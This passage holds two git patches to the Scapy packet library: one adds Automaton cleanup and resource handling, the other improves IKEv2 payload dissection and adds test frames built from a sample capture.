BytesIO() pkt = Ether()/IP()/ICMP() From 664f5985c24c2eb7645bf76327bd333fab5f92b4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 16 Nov 2022 13:01:34 +0100 Subject: [PATCH 0922/1632] Automata: improve memory management (#3743) * Automata memory improvements (cleanup..) * Add docstrings --- doc/scapy/advanced_usage.rst | 12 ++++- scapy/arch/common.py | 3 +- scapy/arch/libpcap.py | 8 ++-- scapy/automaton.py | 88 ++++++++++++++++++++++++------------ scapy/utils.py | 10 ++++ 5 files changed, 88 insertions(+), 33 deletions(-) diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index 8e503ede8c7..edc2b76c19c 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -540,6 +540,7 @@ Running this example gives the following result:: Wait for nothing... Action on 'nothing' condition State=END + >>> a.destroy() This simple automaton can be described with the following graph: @@ -549,6 +550,10 @@ The graph can be automatically drawn from the code with:: >>> HelloWorld.graph() +.. note:: An ``Automaton`` can be reset using ``restart()``. It is then possible to run it again. + +.. warning:: Remember to call ``destroy()`` once you're done using an Automaton. (especially on PyPy) + Changing states --------------- @@ -671,7 +676,9 @@ Here is a real example take from Scapy. It implements a TFTP client that can iss It can be run like this, for instance:: - >>> TFTP_read("my_file", "192.168.1.128").run() + >>> atmt = TFTP_read("my_file", "192.168.1.128") + >>> atmt.run() + >>> atmt.destroy() Detailed documentation ---------------------- @@ -760,6 +767,8 @@ Actions are methods that are decorated by the return of ``ATMT.action`` function :: + from random import random + class Example(Automaton): @ATMT.state(initial=1) def BEGIN(self): @@ -800,6 +809,7 @@ The two possible outputs are:: >>> a.run() We are lucky... This wasn't luck!... + >>> a.destroy() .. note:: If you want to pass a parameter to an action, you can use the ``action_parameters`` function while raising the next state. diff --git a/scapy/arch/common.py b/scapy/arch/common.py index ce354096fea..25f506432a7 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -13,6 +13,7 @@ from scapy.error import Scapy_Exception from scapy.interfaces import network_name from scapy.libs.structures import bpf_program +from scapy.utils import decode_locale_str # Type imports import scapy @@ -104,7 +105,7 @@ def compile_filter(filter_exp, # type: str pcap = pcap_open_live( iface_b, MTU, promisc, 0, err ) - error = bytes(bytearray(err)).strip(b"\x00") + error = decode_locale_str(bytearray(err).strip(b"\x00")) if error: raise OSError(error) ret = pcap_compile( diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index ba8dcdcb52e..2a450710ed8 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -33,7 +33,7 @@ from scapy.packet import Packet from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket -from scapy.utils import str2mac +from scapy.utils import str2mac, decode_locale_str import scapy.consts @@ -126,7 +126,9 @@ def close(self): if self.closed: return self.closed = True - self.pcap_fd.close() + if hasattr(self, "pcap_fd"): + # If failed to open, won't exist + self.pcap_fd.close() ########## @@ -297,7 +299,7 @@ def __init__(self, self.pcap = pcap_open_live(self.iface, snaplen, promisc, to_ms, self.errbuf) - error = bytes(bytearray(self.errbuf)).strip(b"\x00") + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) if error: raise OSError(error) diff --git a/scapy/automaton.py b/scapy/automaton.py index 4dd647cec75..41f513fcd13 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -89,6 +89,10 @@ def select_objects(inputs, remain): if getattr(i, "__selectable_force_select__", False): natives.append(i) elif i.fileno() < 0: + # Special case: On Windows, we consider that an object that returns + # a negative fileno (impossible), is always readable. This is used + # in very few places but important (e.g. PcapReader), where we have + # no valid fileno (and will stop on EOFError). results.add(i) else: events.append(i) @@ -140,7 +144,6 @@ def __init__(self, name=None): self.__rd, self.__wr = os.pipe() self.__queue = deque() # type: Deque[_T] if WINDOWS: - self._fd = None # type: Optional[int] self._wincreate() if WINDOWS: @@ -153,27 +156,23 @@ def _wincreate(self): def _winset(self): # type: () -> None - if ctypes.windll.kernel32.SetEvent( - ctypes.c_void_p(self._fd)) == 0: + if ctypes.windll.kernel32.SetEvent(ctypes.c_void_p(self._fd)) == 0: warning(ctypes.FormatError(ctypes.GetLastError())) def _winreset(self): # type: () -> None - if ctypes.windll.kernel32.ResetEvent( - ctypes.c_void_p(self._fd)) == 0: + if ctypes.windll.kernel32.ResetEvent(ctypes.c_void_p(self._fd)) == 0: warning(ctypes.FormatError(ctypes.GetLastError())) def _winclose(self): # type: () -> None - if self._fd and ctypes.windll.kernel32.CloseHandle( - ctypes.c_void_p(self._fd)) == 0: + if ctypes.windll.kernel32.CloseHandle(ctypes.c_void_p(self._fd)) == 0: warning(ctypes.FormatError(ctypes.GetLastError())) - self._fd = None def fileno(self): # type: () -> int if WINDOWS: - return self._fd if self._fd is not None else -1 + return self._fd return self.__rd def send(self, obj): @@ -199,6 +198,8 @@ def flush(self): def recv(self, n=0): # type: (Optional[int]) -> Optional[_T] if self.closed: + if self.__queue: + return self.__queue.popleft() return None os.read(self.__rd, 1) elt = self.__queue.popleft() @@ -219,12 +220,11 @@ def clear(self): def close(self): # type: () -> None if not self.closed: - self.closed = True os.close(self.__rd) os.close(self.__wr) - self.__queue.clear() if WINDOWS: self._winclose() + self.closed = True def __repr__(self): # type: () -> str @@ -646,6 +646,7 @@ def close(self): # type: () -> None if not self.closed: self.atmt.stop() + self.atmt.destroy() self.spa.close() self.spb.close() self.closed = True @@ -1046,6 +1047,7 @@ def __iter__(self): def __del__(self): # type: () -> None self.stop() + self.destroy() def _run_condition(self, cond, *args, **kargs): # type: (_StateWrapper, Any, Any) -> None @@ -1096,8 +1098,12 @@ def _do_control(self, ready, *args, **kargs): # Start the automaton self.state = self.initial_states[0](self) self.send_sock = self.send_sock_class(**self.socket_kargs) - self.listen_sock = self.recv_sock_class(**self.socket_kargs) - self.packets = PacketList(name="session[%s]" % self.__class__.__name__) # noqa: E501 + if self.recv_conditions: + # Only start a receiving socket if we have at least one recv_conditions + self.listen_sock = self.recv_sock_class(**self.socket_kargs) + else: + self.listen_sock = None + self.packets = PacketList(name="session[%s]" % self.__class__.__name__) singlestep = True iterator = self._do_iter() @@ -1149,6 +1155,10 @@ def _do_control(self, ready, *args, **kargs): self.cmdout.send(m) self.debug(3, "Stopping control thread (tid=%i)" % self.threadid) self.threadid = None + if getattr(self, "listen_sock", None): + self.listen_sock.close() + if getattr(self, "send_sock", None): + self.send_sock.close() def _do_iter(self): # type: () -> Iterator[Union[Automaton.AutomatonException, Automaton.AutomatonStopped, ATMT.NewStateRequested, None]] # noqa: E501 @@ -1196,7 +1206,7 @@ def _do_iter(self): time_previous = time.time() fds = [self.cmdin] - if len(self.recv_conditions[self.state.state]) > 0: + if self.listen_sock and self.recv_conditions[self.state.state]: fds.append(self.listen_sock) for ioev in self.ioevents[self.state.state]: fds.append(self.ioin[ioev.atmt_ioname]) @@ -1273,8 +1283,10 @@ def remove_breakpoints(self, *bps): def start(self, *args, **kargs): # type: (Any, Any) -> None - if not self.started.locked(): - self._do_start(*args, **kargs) + if self.started.locked(): + raise ValueError("Already started") + # Start the control thread + self._do_start(*args, **kargs) def run(self, resume=None, # type: Optional[Message] @@ -1315,26 +1327,46 @@ def next(self): def _flush_inout(self): # type: () -> None - with self.started: - # Flush command pipes - while True: - r = select_objects([self.cmdin, self.cmdout], 0) - if not r: - break - for fd in r: - fd.recv() + # Flush command pipes + for cmd in [self.cmdin, self.cmdout]: + cmd.clear() + + def destroy(self): + # type: () -> None + """ + Destroys a stopped Automaton: this cleanups all opened file descriptors. + Required on PyPy for instance where the garbage collector behaves differently. + """ + if self.started.locked(): + raise ValueError("Can't close running Automaton ! Call stop() beforehand") + self._flush_inout() + # Close command pipes + self.cmdin.close() + self.cmdout.close() + # Close opened ioins/ioouts + for i in itertools.chain(self.ioin.values(), self.ioout.values()): + if isinstance(i, ObjectPipe): + i.close() def stop(self, wait=True): # type: (bool) -> None - self.cmdin.send(Message(type=_ATMT_Command.STOP)) + try: + self.cmdin.send(Message(type=_ATMT_Command.STOP)) + except OSError: + pass if wait: - self._flush_inout() + with self.started: + self._flush_inout() def forcestop(self, wait=True): # type: (bool) -> None - self.cmdin.send(Message(type=_ATMT_Command.FORCESTOP)) + try: + self.cmdin.send(Message(type=_ATMT_Command.FORCESTOP)) + except OSError: + pass if wait: - self._flush_inout() + with self.started: + self._flush_inout() def restart(self, *args, **kargs): # type: (Any, Any) -> None diff --git a/scapy/utils.py b/scapy/utils.py index 060ba139d34..e8a77061e71 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -17,6 +17,7 @@ import decimal import difflib import gzip +import locale import os import random import re @@ -703,6 +704,15 @@ def itom(x): return (0xffffffff00000000 >> x) & 0xffffffff +def decode_locale_str(x): + # type: (bytes) -> str + """ + Decode bytes into a string using the system locale. + Useful on Windows where it can be unusual (e.g. cp1252) + """ + return x.decode(encoding=locale.getlocale()[1] or "utf-8", errors="replace") + + class ContextManagerSubprocess(object): """ Context manager that eases checking for unknown command, without From 0945bb5dbfa85fa611d2055423d8c3bf4cbf5756 Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Sat, 19 Nov 2022 12:15:51 +0100 Subject: [PATCH 0923/1632] IKEv2: improve and test dissection of decrypted IKEv2 payloads (#3787) * IKEv2: improve dissection of the IDi and IDr payload See RFC 7296, section 3.5 * IKEv2: improve dissection of the Configuration payload See RFC 7296, section 3.15 * IKEv2: test dissection of some decrypted IKEv2 payloads This commit adds two testcases to the advanced test, which verify dissecting and building for the two decrypted IKE_AUTH messages of the pcap file. * IKEv2 keyexchange with NAT-traversal - IKE_SA_INIT request - IKE_SA_INIT response - IKE_AUTH request - IKE_AUTH response - IKE_AUTH request, decrypted (new) - IKE_AUTH response, decrypted (new) Effectively, those two testcases combine unit tests for the following payloads transmitted in the Encrypted payload of the IKE_AUTH exchange: AUTH, CERTREQ, CERT_CRT, CP, IDi, IDr, Nonce, Notify, Proposal, SA, TSi, TSr, Transform, VendorID Also add a forgotten reference to the origin of the capture file: it is taken from 'Example 2: Dissection of encrypted (and UDP-encapsulated) IKEv2 and ESP messages' on the Wireshark [SampleCaptures] Wiki page. Note: The tarfile not only contains the pcap file but also the secrets which enable Wireshark (v3.6+) to decrypt the IKE and ESP traffic. The raw frame data was crafted manually using Wireshark for decrypting the encrypted payload and Scapy for gluing the layers together. [SampleCaptures]: https://gitlab.com/wireshark/wireshark/-/wikis/SampleCaptures --- scapy/contrib/ikev2.py | 100 +++++- test/contrib/ikev2.uts | 672 ++++++++++++++++++++++++++++++++++++++++- 2 files changed, 753 insertions(+), 19 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 60269176f99..2c0a84ba7cc 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -19,6 +19,7 @@ split_bottom_up, split_layers, Raw from scapy.fields import ByteEnumField, ByteField, ConditionalField, \ FieldLenField, FlagsField, IP6Field, IPField, IntField, MultiEnumField, \ + MultipleTypeField, \ PacketField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField from scapy.layers.x509 import X509_Cert, X509_CRL @@ -29,7 +30,7 @@ from scapy.config import conf from scapy.volatile import RandString -# see http://www.iana.org/assignments/ikev2-parameters for details +# see https://www.iana.org/assignments/ikev2-parameters for details IKEv2AttributeTypes = {"Encryption": (1, {"DES-IV64": 1, "DES": 2, "3DES": 3, @@ -219,6 +220,39 @@ 9: "TS_FC_ADDR_RANGE" } +IKEv2ConfigurationPayloadCFGTypes = { + 1: "CFG_REQUEST", + 2: "CFG_REPLY", + 3: "CFG_SET", + 4: "CFG_ACK" +} + +IKEv2ConfigurationAttributeTypes = { + 1: "INTERNAL_IP4_ADDRESS", + 2: "INTERNAL_IP4_NETMASK", + 3: "INTERNAL_IP4_DNS", + 4: "INTERNAL_IP4_NBNS", + 6: "INTERNAL_IP4_DHCP", + 7: "APPLICATION_VERSION", + 8: "INTERNAL_IP6_ADDRESS", + 10: "INTERNAL_IP6_DNS", + 12: "INTERNAL_IP6_DHCP", + 13: "INTERNAL_IP4_SUBNET", + 14: "SUPPORTED_ATTRIBUTES", + 15: "INTERNAL_IP6_SUBNET", + 16: "MIP6_HOME_PREFIX", + 17: "INTERNAL_IP6_LINK", + 18: "INTERNAL_IP6_PREFIX", + 19: "HOME_AGENT_ADDRESS", + 20: "P_CSCF_IP4_ADDRESS", + 21: "P_CSCF_IP6_ADDRESS", + 22: "FTT_KAT", + 23: "EXTERNAL_SOURCE_IP4_NAT_INFO", + 24: "TIMEOUT_PERIOD_FOR_LIVENESS_CHECK", + 25: "INTERNAL_DNS_DOMAIN", + 26: "INTERNAL_DNSSEC_TA" +} + IPProtocolIDs = { 0: "All protocols", 1: "Internet Control Message Protocol", @@ -691,7 +725,7 @@ class IKEv2_payload_KE(IKEv2_class): ] -class IKEv2_payload_IDi(IKEv2_class): +class IKEv2_payload_IDi(IKEv2_class): # RFC 7296, section 3.5 name = "IKEv2 Identification - Initiator" overload_fields = {IKEv2: {"next_payload": 35}} fields_desc = [ @@ -699,25 +733,33 @@ class IKEv2_payload_IDi(IKEv2_class): ByteField("res", 0), FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), ByteEnumField("IDtype", 1, {1: "IPv4_addr", 2: "FQDN", 3: "Email_addr", 5: "IPv6_addr", 11: "Key"}), # noqa: E501 - ByteEnumField("ProtoID", 0, {0: "Unused"}), - ShortEnumField("Port", 0, {0: "Unused"}), - # IPField("IdentData","127.0.0.1"), - StrLenField("load", "", length_from=lambda x: x.length - 8), + X3BytesField("res2", 0), + MultipleTypeField( + [ + (IPField("ID", "127.0.0.1"), lambda x: x.IDtype == 1), + (IP6Field("ID", "::1"), lambda x: x.IDtype == 5), + ], + StrLenField("ID", "", length_from=lambda x: x.length - 8), + ) ] -class IKEv2_payload_IDr(IKEv2_class): +class IKEv2_payload_IDr(IKEv2_class): # RFC 7296, section 3.5 name = "IKEv2 Identification - Responder" overload_fields = {IKEv2: {"next_payload": 36}} fields_desc = [ ByteEnumField("next_payload", None, IKEv2_payload_type), ByteField("res", 0), - FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + FieldLenField("length", None, "ID", "H", adjust=lambda pkt, x:x + 8), ByteEnumField("IDtype", 1, {1: "IPv4_addr", 2: "FQDN", 3: "Email_addr", 5: "IPv6_addr", 11: "Key"}), # noqa: E501 - ByteEnumField("ProtoID", 0, {0: "Unused"}), - ShortEnumField("Port", 0, {0: "Unused"}), - # IPField("IdentData","127.0.0.1"), - StrLenField("load", "", length_from=lambda x: x.length - 8), + X3BytesField("res2", 0), + MultipleTypeField( + [ + (IPField("ID", "127.0.0.1"), lambda x: x.IDtype == 1), + (IP6Field("ID", "::1"), lambda x: x.IDtype == 5), + ], + StrLenField("ID", "", length_from=lambda x: x.length - 8), + ) ] @@ -732,6 +774,40 @@ class IKEv2_payload_Encrypted(IKEv2_class): ] +class ConfigurationAttribute(Packet): + name = "IKEv2 Configuration Attribute" + fields_desc = [ + ShortEnumField("type", 1, IKEv2ConfigurationAttributeTypes), + FieldLenField("length", None, "value", "H"), + MultipleTypeField( + [ + (IPField("value", "127.0.0.1"), + lambda x: x.length == 4 and x.type in (1, 2, 3, 4, 6, 20)), + (IP6Field("value", "::1"), + lambda x: x.length == 16 and x.type in (10, 12, 21)), + ], + StrLenField("value", "", length_from=lambda x: x.length), + ) + ] + + def extract_padding(self, s): + return b'', s + + +class IKEv2_payload_CP(IKEv2_class): # RFC 7296, section 3.15 + name = "IKEv2 Configuration" + overload_fields = {IKEv2: {"next_payload": 46}} + fields_desc = [ + ByteEnumField("next_payload", None, IKEv2_payload_type), + ByteField("res", 0), + FieldLenField("length", None, "load", "H", adjust=lambda pkt, x:x + 8), + ByteEnumField("CFGType", 1, IKEv2ConfigurationPayloadCFGTypes), + X3BytesField("res2", 0), + PacketListField("attributes", None, ConfigurationAttribute, + length_from=lambda x: x.length - 8), + ] + + class IKEv2_payload_Encrypted_Fragment(IKEv2_class): name = "IKEv2 Encrypted Fragment" overload_fields = {IKEv2: {"next_payload": 53}} diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index ace7c1dc425..692d818e487 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -342,10 +342,11 @@ f63e8829a9f066dc ecb8c12cf91836cd 7b7300b86ecea0f7 467b2991832c8380 frames = [ - # IKE_SA_INIT request ( # i: frame number 0, + # title: + "IKE_SA_INIT request", # data: raw frame data binascii.unhexlify(''.join(""" 005056eddb32000c 2930109e08004500 014cedc240004011 da45c0a8f583ac10 @@ -486,10 +487,11 @@ frames = [ load=b'\x00\x01\x00\x02\x00\x03\x00\x04' ) ), - # IKE_SA_INIT response ( # i: frame number 1, + # title: + "IKE_SA_INIT response", # data: raw frame data binascii.unhexlify(''.join(""" 000c2930109e0050 56eddb3208004500 0151a5dc00008011 2227ac100f5cc0a8 @@ -636,10 +638,11 @@ frames = [ type='MULTIPLE_AUTH_SUPPORTED' ) ), - # IKE_AUTH request ( # i: frame number 2, + # title: + "IKE_AUTH request", # data: raw frame data binascii.unhexlify(''.join(""" 005056eddb32000c 2930109e08004500 0520edc640004011 d66dc0a8f583ac10 @@ -669,10 +672,11 @@ frames = [ load = ike_auth_request_encrypted_payload ) ), - # IKE_AUTH response ( # i: frame number 3, + # title: + "IKE_AUTH response", # data: raw frame data binascii.unhexlify(''.join(""" 000c2930109e0050 56eddb3208004500 0518a5dd00008011 1e5fac100f5cc0a8 @@ -702,12 +706,666 @@ frames = [ load=ike_auth_response_encrypted_payload ) ), + ( + # i: frame number + -2, + # title: + "IKE_AUTH request, decrypted", + binascii.unhexlify(''.join(""" + 005056eddb32000c 2930109e08004500 0520edc640004011 d66dc0a8f583ac10 + 0f5c2aca1194050c 8eb0000000008992 2c915f35570e98d5 6d32e2a047422320 + 2308000000010000 0500250000120300 0000696b6576322d 63657274290002dc + 04308202d3308202 79a0030201020204 01000013300a0608 2a8648ce3d040302 + 304b310b30090603 5504061302444531 0f300d0603550408 130642617965726e + 310c300a06035504 0a13034e4350311d 301b060355040313 144e43502044656d + 6f20434120454343 2032303530302218 0f32303136303830 343038303031335a + 180f323035303038 3035303830303133 5a3074310b300906 0355040613024445 + 311a301806035504 0a0c1144656d6f20 4f7267616e697a61 74696f6e3110300e + 060355040b0c0744 656d6f204f553110 300e06035504030c 07436c69656e7431 + 3125302306092a86 4886f70d01090116 16636c69656e7431 4064656d6f2e6e63 + 702d652e636f6d30 59301306072a8648 ce3d020106082a86 48ce3d0301070342 + 0004b74572a1b5dd 1c4cafdab7f06a92 913cab7ee2a55106 efa4056e2dc17369 + 600510553454e37e 69e9a08c5abae5a0 5a77e01ebb04e4b2 72fe349f12a34088 + ceeaa382011c3082 011830090603551d 1304023000300b06 03551d0f04040302 + 05a0301d0603551d 250416301406082b 0601050507030206 082b060105050703 + 07301d0603551d0e 041604145a5e6aa2 9f89959131c17018 ef64dc2a8a4a4a6a + 30750603551d2304 6e306c801425db6d 44dec7a03eb5f862 3ab18784546a0f04 + 09a14fa44d304b31 0b30090603550406 13024445310f300d 0603550408130642 + 617965726e310c30 0a060355040a1303 4e4350311d301b06 0355040313144e43 + 502044656d6f2043 4120454343203230 3530820302000230 490603551d110442 + 3040a026060a2b06 0104018237140203 a0180c16436c6965 6e74314064656d6f + 2e6e63702d652e63 6f6d8116436c6965 6e74314064656d6f 2e6e63702d652e63 + 6f6d300a06082a86 48ce3d0403020348 0030450220602d76 6db7e07b70d88e38 + 10acc6cd350ccdda 1e60d77bd36ed6e6 0f869ef371022100 d1e3d278fcacf41c + d8380691363ad393 3d6bc293fae9c847 ddf6187bb0f06f49 2900000801004000 + 2600000801004008 270000410491c1dc 0f2a8f0e3bd7da99 1a43a39226355e42 + 29bcb62a0e9de979 fda864e3f06460dc aaff850759f48956 233865214e9a10e6 + 376f4c59b5c02f36 6d2f00005c0e0000 000c300a06082a86 48ce3d0403023045 + 022100c1486ab5b3 db4c8b08f3ae0613 20104c826fb0803b a1e6e30d58c8000b + ac514202205865ea 41bc99e0adfa2856 770efaff530f2e85 50da1d86f8504df0 + 04025fb12d210000 8001000000000100 0000020000000300 00000400004e2200 + 0000080000000900 00000a0000001900 0000070000700000 0070010000700200 + 004e2600004e2700 0070030000700400 0070050000700600 0070070000700800 + 00700900004e2300 004e240000700a00 004e250006646562 69616e700a000664 + 656269616e2c0000 2400000020010304 02c1a9656b030000 0c01000014800e00 + 8000000008050000 002d000018010000 00070000100000ff ff00000000ffffff + ff2b000018010000 00070000100000ff ffc0a8e100c0a8e1 ff2b000014afcad7 + 1368a1f1c96b8696 fc775701002b0000 14c61baca1f1a60c c208000000000000 + 002900001c4e6350 0a09b8e83c80b693 36268ec8f6000c29 30109e0000290000 + 080000400c000000 0800004014 + """.split())), + Ether(dst='00:50:56:ed:db:32', src='00:0c:29:30:10:9e', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=1312, id=60870, flags='DF', frag=0, ttl=64, proto='udp', chksum=0xd66d, src='192.168.245.131', dst='172.16.15.92') / + UDP(sport=10954, dport=4500, len=1292, chksum=0x8eb0) / + NON_ESP(non_esp=0x0) / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x98\xd5m2\xe2\xa0GB', + next_payload='IDi', + version=0x20, + exch_type='IKE_AUTH', + flags='Initiator', + id=1, + length=1280 + ) / + IKEv2_payload_IDi( + next_payload='CERT', + res=0, + length=18, + IDtype='Email_addr', + res2=0x0, + ID='ikev2-cert' + ) / + IKEv2_payload_CERT_CRT( + next_payload='Notify', res=0, length=732, + cert_type='X.509 Certificate - Signature', + x509Cert=X509_Cert( + tbsCertificate=X509_TBSCertificate( + version=ASN1_INTEGER(2), + serialNumber=ASN1_INTEGER(0x1000013), + signature=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecdsa-with-SHA256'), + parameters=None + ), + issuer=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('stateOrProvinceName'), value=ASN1_PRINTABLE_STRING(b'Bayern'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_PRINTABLE_STRING(b'NCP'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_PRINTABLE_STRING(b'NCP Demo CA ECC 2050'))) + ], + validity=X509_Validity( + not_before=ASN1_GENERALIZED_TIME('20160804080013Z'), + not_after=ASN1_GENERALIZED_TIME('20500805080013Z') + ), + subject=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=(X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_UTF8_STRING(b'Demo Organization')))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationUnitName'), value=ASN1_UTF8_STRING(b'Demo OU'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_UTF8_STRING(b'Client1'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('emailAddress'), value=ASN1_IA5_STRING(b'client1@demo.ncp-e.com'))) + ], + subjectPublicKeyInfo=X509_SubjectPublicKeyInfo( + signatureAlgorithm=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecPublicKey'), + parameters=ASN1_OID('prime256v1')), + subjectPublicKey=ECDSAPublicKey( + ecPoint=ASN1_BIT_STRING( + '000001001011011101000101011100101010000110110101110111010001110' + '001001100101011111101101010110111111100000110101010010010100100' + '010011110010101011011111101110001010100101010100010000011011101' + '111101001000000010101101110001011011100000101110011011010010110' + '000000000101000100000101010100110100010101001110001101111110011' + '010011110100110100000100011000101101010111010111001011010000001' + '011010011101111110000000011110101110110000010011100100101100100' + '111001011111110001101001001111100010010101000110100000010001000' + '1100111011101010'))), + issuerUniqueID=None, + subjectUniqueID=None, + extensions=[ + X509_Extension( + extnID=ASN1_OID('basicConstraints'), + critical=None, + extnValue=X509_ExtBasicConstraints(cA=None, pathLenConstraint=None) + ), + X509_Extension( + extnID=ASN1_OID('keyUsage'), + critical=None, + extnValue=X509_ExtKeyUsage(keyUsage=ASN1_BIT_STRING('101')) + ), + X509_Extension( + extnID=ASN1_OID('extKeyUsage'), + critical=None, + extnValue=X509_ExtExtendedKeyUsage( + extendedKeyUsage=[ + ASN1P_OID(oid=ASN1_OID('clientAuth')), + ASN1P_OID(oid=ASN1_OID('ipsecUser')) + ] + ) + ), + X509_Extension( + extnID=ASN1_OID('subjectKeyIdentifier'), + critical=None, + extnValue=X509_ExtSubjectKeyIdentifier( + keyIdentifier=ASN1_STRING(b'Z^j\xa2\x9f\x89\x95\x911\xc1p\x18\xefd\xdc*\x8aJJj') + ) + ), + X509_Extension( + extnID=ASN1_OID('authorityKeyIdentifier'), + critical=None, + extnValue=X509_ExtAuthorityKeyIdentifier( + keyIdentifier=ASN1_STRING(b'%\xdbmD\xde\xc7\xa0>\xb5\xf8b:\xb1\x87\x84Tj\x0f\x04\t'), + authorityCertIssuer=X509_GeneralName( + generalName=X509_DirectoryName( + directoryName=[ + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('countryName'), value=ASN1_PRINTABLE_STRING(b'DE'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('stateOrProvinceName'), value=ASN1_PRINTABLE_STRING(b'Bayern'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('organizationName'), value=ASN1_PRINTABLE_STRING(b'NCP'))), + X509_RDN(rdn=X509_AttributeTypeAndValue(type=ASN1_OID('commonName'), value=ASN1_PRINTABLE_STRING(b'NCP Demo CA ECC 2050'))) + ] + ) + ), + authorityCertSerialNumber=ASN1_INTEGER(0x20002) + ) + ), + X509_Extension( + extnID=ASN1_OID('subjectAltName'), + critical=None, + extnValue=X509_ExtSubjectAltName( + subjectAltName=[ + X509_GeneralName( + generalName=X509_OtherName( + type_id=ASN1_OID('.1.3.6.1.4.1.311.20.2.3'), + value=ASN1_UTF8_STRING(b'Client1@demo.ncp-e.com') + ) + ), + X509_GeneralName( + generalName=X509_RFC822Name( + rfc822Name=ASN1_IA5_STRING(b'Client1@demo.ncp-e.com') + ) + ) + ] + ) + ) + ] + ), + signatureAlgorithm=X509_AlgorithmIdentifier( + algorithm=ASN1_OID('ecdsa-with-SHA256'), + parameters=None + ), + signatureValue=ECDSASignature( + r=ASN1_INTEGER(0x602d766db7e07b70d88e3810acc6cd350ccdda1e60d77bd36ed6e60f869ef371), + s=ASN1_INTEGER(0xd1e3d278fcacf41cd8380691363ad3933d6bc293fae9c847ddf6187bb0f06f49) + ) + ) + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=8, + proto='IKE', + SPIsize=0, + type='INITIAL_CONTACT', + SPI='', + load='' + ) / + IKEv2_payload_Notify( + next_payload='CERTREQ', + res=0, + length=8, + proto='IKE', + SPIsize=0, + type='HTTP_CERT_LOOKUP_SUPPORTED', + SPI='', + load='' + ) / + IKEv2_payload_CERTREQ( + next_payload='AUTH', + res=0, + length=65, + cert_type='X.509 Certificate - Signature', + cert_data=b'\x91\xc1\xdc\x0f*\x8f\x0e;\xd7\xda\x99\x1aC\xa3\x92&5^B)\xbc\xb6*\x0e\x9d\xe9y\xfd\xa8d\xe3\xf0d`\xdc\xaa\xff\x85\x07Y\xf4\x89V#8e!N\x9a\x10\xe67oLY\xb5\xc0/6m' + ) / + IKEv2_payload_AUTH( + next_payload='CP', + res=0, + length=92, + auth_type='Digital Signature', + res2=0x0, + load=b'\x0c0\n\x06\x08*\x86H\xce=\x04\x03\x020E\x02!\x00\xc1Hj\xb5\xb3\xdbL\x8b\x08\xf3\xae\x06\x13 \x10L\x82o\xb0\x80;\xa1\xe6\xe3\rX\xc8\x00\x0b\xacQB\x02 Xe\xeaA\xbc\x99\xe0\xad\xfa(Vw\x0e\xfa\xffS\x0f.\x85P\xda\x1d\x86\xf8PM\xf0\x04\x02_\xb1-' + ) / + IKEv2_payload_CP( + next_payload='SA', + res=0, + length=128, + CFGType='CFG_REQUEST', + res2=0x0, + attributes=[ + ConfigurationAttribute(type='INTERNAL_IP4_ADDRESS', length=0, value=''), + ConfigurationAttribute(type='INTERNAL_IP4_NETMASK', length=0, value=''), + ConfigurationAttribute(type='INTERNAL_IP4_DNS', length=0, value=''), + ConfigurationAttribute(type='INTERNAL_IP4_NBNS', length=0, value=''), + ConfigurationAttribute(type=20002, length=0, value=''), + ConfigurationAttribute(type='INTERNAL_IP6_ADDRESS', length=0, value=''), + ConfigurationAttribute(type=9, length=0, value=''), + ConfigurationAttribute(type='INTERNAL_IP6_DNS', length=0, value=''), + ConfigurationAttribute(type='INTERNAL_DNS_DOMAIN', length=0, value=''), + ConfigurationAttribute(type='APPLICATION_VERSION', length=0, value=''), + ConfigurationAttribute(type=28672, length=0, value=''), + ConfigurationAttribute(type=28673, length=0, value=''), + ConfigurationAttribute(type=28674, length=0, value=''), + ConfigurationAttribute(type=20006, length=0, value=''), + ConfigurationAttribute(type=20007, length=0, value=''), + ConfigurationAttribute(type=28675, length=0, value=''), + ConfigurationAttribute(type=28676, length=0, value=''), + ConfigurationAttribute(type=28677, length=0, value=''), + 